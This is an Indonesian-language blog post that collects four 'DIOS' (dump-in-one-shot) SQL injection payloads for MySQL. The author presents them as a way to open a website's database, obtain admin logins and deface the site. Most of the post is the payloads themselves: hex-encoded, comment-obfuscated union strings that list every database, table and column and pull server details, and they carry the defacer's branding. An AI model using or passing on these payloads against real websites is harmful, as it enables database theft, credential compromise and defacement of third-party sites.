Other  

KUMPULAN DIOS SQLI INJECTION

Sqli injection adalah serangan pada website yang menggunakan kode kode untuk mengeksekusi bug tersebut untuk membuka database website yang sangat penting apalagi terbocorkan web tersebut bisa terkena defacing karena website yang vuln sql injection bisa di eksekusi lalu di ketahui username password untuk login Admin

saya akan membagikan Dios Sqli injection, dios sqli injection adalah code untuk meng eksekusi atau melihat database wesbite tersebut, untuk Tutorial sqli injection silahkan liat tutor sebelum Nya

Dios 1

/*!00000concat*/(0x3c696d67207372633d2268747470733a2f2f652e746f7034746f702e696f2f705f313835346533763731322e6a7067222077696474683d22353025223e3c6831207374796c653d22636f6c6f723a726564223e4645524441524b2047414e533c2f68313e,sysdate(),0x3c62723e,version/**_**/(),0x3c62723e44622055736572203a20,user/**/(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))

Dios 2

CONCAT(0x496e6a656374206279204645524459,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a))

Dios 3

concat(0x2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d,0x3c62723e,0x3c62723e, 0x4449204241434f4b204f4c4548204645524459,0x3c62723e,0x3c62723e, 0x2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d,0x3c62723e,0x3c62723e, 0x4461746162617365203a3a20,database(), 0x3c62723e,0x55736572203a3a20,user(),0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e, 0x486f73746e616d65203a3a20,@@hostname, 0x3c62723e,0x4461746120646972203a3a20,@@datadir,0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))

Dios 4

concat(%27INFECT%20BY%20FERDY%27,%27%3Cbr%3E%27,%27%3Cimg%20src=%22https://j.top4top.io/p_1827l8bwe0.jpg%22%20width=%22200px%22%20style=%22border:2px%20solid%20blue;%20border-radius:50%;%20box-shadow:2px%202px%2015px%20black;%22%3E%27,%27%3Cbr%3E%27,%27Database%20::%20%27,database(),%27%3Cbr%3E%27,%27Version%20::%20%27,version(),%27%3Cbr%3E%27,%27Hostname%20::%20%27,@@hostname,%27%3Cbr%3E%27,%27Tmp%20dir%20::%20%27,@@tmpdir,%27%3Cbr%3E%27,%27Data%20dir%20::%20%27,@@datadir,%27%3Cbr%3E%27,%27Base%20dir%20::%20%27,@@basedir,%27%3Cbr%3E%27,%27Log%20error%20::%20%27,@@log_error,%27%3Cbr%3E%27,%27Socket%20::%20%27,@@socket,%27%3Cbr%3E%27,%27Pid%20file%20::%20%27,@@pid_file,%27%3Cbr%3E%27,%27Operating%20system%20::%20%27,@@version_compile_os,%27%3Cbr%3E%27,%27Operating%20machine%20::%20%27,@@version_compile_machine,%27%3Cbr%3E%27,%27Symlink%20::%20%27,@@global.have_symlink,%27%3Cbr%3E%27,%27SSL%20::%20%27,@@global.have_ssl,%27%3Cbr%3E%27,%27Port%20::%20%27,@@port,%27%3Cbr%3E%27,%27%3Cbr%3E%27,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,%27%3Cbr%3E%27,table_name,%27%20::%20%27,column_name))))x))

Kayak nya cukup segini aja Sekian dan terimakasih

Exit mobile version